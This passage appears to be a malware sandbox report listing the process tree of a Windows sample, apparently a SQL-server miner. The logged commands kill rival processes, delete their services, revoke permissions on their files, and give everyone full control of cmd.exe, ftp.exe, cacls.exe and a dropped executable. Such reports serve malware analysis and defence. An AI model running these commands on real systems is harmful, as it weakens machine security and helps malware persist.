Cacls "C:\Windows\SystemCvlsa\*" /t /e /c /r system
3⤵
PID:3852

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r everyone
3⤵
PID:688

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r system
3⤵
PID:392

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\*" /t /e /c /r everyone
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\*" /t /e /c /r system
3⤵
PID:4128

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r everyone
3⤵
PID:3928

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r system
3⤵
PID:2588

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r everyone
3⤵
PID:4656

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r system
3⤵
PID:4444

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r everyone
3⤵
PID:2360

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r system
3⤵
PID:4700

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r everyone
3⤵
PID:3476

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r system
3⤵
PID:4284

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r everyone
3⤵
PID:3252

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe" /t /e /c /r system
3⤵
PID:3512

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r everyone
3⤵
PID:2936

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe" /t /e /c /r system
3⤵
PID:1452

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r everyone
3⤵
PID:4316

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe" /t /e /c /r system
3⤵
PID:2540

C:\Windows\SysWOW64\sc.exe
sc delete "CVIDIA AlibabaProtect ClobalSign"
3⤵
- Launches sc.exe
PID:2104

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nsmart64.exe
3⤵
PID:1524

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nsmart64.exe
3⤵
PID:4632

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nsmart32.exe
3⤵
- Kills process with taskkill
PID:3220

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Nsmart32.exe
3⤵
- Kills process with taskkill
PID:4672

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Globalan.exe
3⤵
PID:100

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Globalan.exe
3⤵
PID:4364

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\*" /t /e /c /r everyone
3⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\*" /t /e /c /r system
3⤵
PID:4676

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r everyone
3⤵
PID:5000

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r system
3⤵
PID:2664

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\*" /t /e /c /r everyone
3⤵
PID:3620

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\*" /t /e /c /r system
3⤵
PID:3552

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r everyone
3⤵
PID:1080

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemSvlsa\Globalan.exe" /t /e /c /r system
3⤵
PID:4100

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r everyone
3⤵
PID:3484

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r system
3⤵
PID:1096

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r everyone
3⤵
PID:2424

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r system
3⤵
PID:212

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r everyone
3⤵
PID:452

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r system
3⤵
PID:3264

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r everyone
3⤵
PID:4472

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe" /t /e /c /r system
3⤵
PID:2100

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r everyone
3⤵
PID:1212

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe" /t /e /c /r system
3⤵
PID:4164

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r everyone
3⤵
PID:3500

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe" /t /e /c /r system
3⤵
PID:2236

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA SlibabaProtect GlobalSign"
3⤵
- Launches sc.exe
PID:796

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NVDispla64.exe
3⤵
- Kills process with taskkill
PID:4108

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NVDispla64.exe
3⤵
PID:4348

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NGlobalan.exe
3⤵
- Kills process with taskkill
PID:1752

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NGlobalan.exee
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\*" /t /e /c /r everyone
3⤵
PID:1512

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\*" /t /e /c /r system
3⤵
PID:484

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r everyone
3⤵
PID:3236

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r system
3⤵
PID:4844

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\*" /t /e /c /r everyone
3⤵
PID:3508

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\*" /t /e /c /r system
3⤵
PID:2264

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r everyone
3⤵
PID:3880

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemNvlsa\NGlobalan.exe" /t /e /c /r system
3⤵
PID:2296

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r everyone
3⤵
PID:984

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r system
3⤵
PID:4648

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r everyone
3⤵
PID:2516

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r system
3⤵
PID:1692

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r everyone
3⤵
PID:3084

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft NctiveStec\NVDispla64.exe" /t /e /c /r system
3⤵
PID:1432

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r everyone
3⤵
PID:3404

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe" /t /e /c /r system
3⤵
PID:1664

C:\Windows\SysWOW64\sc.exe
sc delete "NVIDIA AlibabaProtect GlobalSign"
3⤵
- Launches sc.exe
PID:308

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WmiPrvSER.exe
3⤵
PID:3548

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Netsh_Help.dll
3⤵
PID:3960

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im powershell.exe
3⤵
PID:4824

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sqltem64.exe
3⤵
PID:392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sqltem64.exe
3⤵
PID:2012

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
- Kills process with taskkill
PID:4392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
PID:2360

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols" /t /e /c /r everyone
3⤵
PID:3912

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols" /t /e /c /r system
3⤵
PID:404

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone
3⤵
PID:3760

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r system
3⤵
PID:3388

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols" /t /e /c /r everyone
3⤵
PID:1856

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols" /t /e /c /r system
3⤵
PID:116

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\*" /t /e /c /r everyone
3⤵
PID:3840

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\*" /t /e /c /r system
3⤵
PID:2104

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone
3⤵
PID:5052

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system
3⤵
PID:4236

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone
3⤵
PID:1652

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe /t /e /c /r system
3⤵
PID:3188

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\*" /t /e /c /r everyone
3⤵
PID:3664

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\*" /t /e /c /r system
3⤵
PID:3700

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone
3⤵
PID:3824

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system
3⤵
PID:4724

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r everyone
3⤵
PID:3328

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r system
3⤵
PID:4912

C:\Windows\SysWOW64\sc.exe
sc delete "Norporati Windows AppVNice"
3⤵
- Launches sc.exe
PID:4556

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows SystenApp"
3⤵
- Launches sc.exe
PID:340

C:\Windows\SysWOW64\sc.exe
sc delete "dorporati windows dribe diskraid"
3⤵
- Launches sc.exe
PID:4676

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Kills process with taskkill
PID:4360

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
PID:1284

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Kills process with taskkill
PID:3296

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Kills process with taskkill
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cacls.exe /e /t /g everyone:f
2⤵
PID:4108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f
3⤵
PID:3964

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g everyone:f
2⤵
PID:816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f
3⤵
PID:5480

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f
2⤵
PID:3096

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f
3⤵
PID:5376

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f
2⤵
PID:4008

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f
3⤵
PID:5392

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cacls.exe /e /t /g system:f
2⤵
PID:1808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g system:f
3⤵
PID:5464

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g system:f
2⤵
PID:1516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f
3⤵
PID:5408

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cacls.exe /e /t /g system:f
2⤵
PID:2792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g system:f
3⤵
PID:5448

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f
2⤵
PID:3336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f
3⤵
PID:5440

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f
2⤵
PID:3000

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f
3⤵
PID:5592

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f
2⤵
PID:5004

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f
3⤵
PID:5648

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g everyone:f
2⤵
PID:1816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f
3⤵
PID:5608

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cmd.exe /e /t /g everyone:f
2⤵
PID:3536

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f
3⤵
PID:5384

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f
2⤵
PID:4948

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f
3⤵
PID:5852

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cmd.exe /e /t /g system:f
2⤵
PID:3548

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g system:f
3⤵
PID:5620

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g system:f
2⤵
PID:4112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f
3⤵
PID:5804

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cmd.exe /e /t /g system:f
2⤵
PID:880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g system:f
3⤵
PID:5632

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\ftp.exe /e /t /g everyone:f
2⤵
PID:1452

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f
3⤵
PID:5828

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g everyone:f
2⤵
PID:1856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f
3⤵
PID:5796

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f
2⤵
PID:4476

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f
3⤵
PID:5884

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
2⤵
PID:4952

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
3⤵
PID:6048

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
2⤵
PID:3280

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
3⤵
PID:5988

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
2⤵
PID:4344

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
3⤵
PID:5980

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
2⤵
PID:4556

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
3⤵
PID:6008

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:6076

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
2⤵
PID:3232

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
3⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4412

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5924

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
2⤵
PID:3848

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
3⤵
PID:6116

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4100

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5916

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3276

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:5680

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:1096

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:224

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:2176

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3720

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:6060

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:1372

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
2⤵
PID:1736

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
3⤵
PID:5876

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3620

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5900

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:6136

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\ftp.exe /e /t /g system:f
2⤵
PID:4632

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g system:f
3⤵
PID:6104

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g system:f
2⤵
PID:4236

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f
3⤵
PID:5972

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\ftp.exe /e /t /g system:f
2⤵
PID:5052

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g system:f
3⤵
PID:6024

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f
2⤵
PID:2540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f
3⤵
PID:5772

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f
2⤵
PID:116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f
3⤵
PID:5868

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cmd.exe
2⤵
PID:5484

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cmd.exe
3⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cacls.exe
2⤵
PID:3604

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cacls.exe
3⤵
- Kills process with taskkill
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
2⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
2⤵
PID:4772

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
3⤵
PID:6132

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
2⤵
PID:5816

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
3⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
2⤵
PID:5908

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
3⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:5916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:5440

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cmd.exe
2⤵
PID:2884

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:4944

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:6068

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:1480

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
2⤵
PID:924

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
3⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:6092

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5244

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
2⤵
PID:1144

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
3⤵
PID:6136

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5936

C:\Windows\SysWOW64\cacls.exe
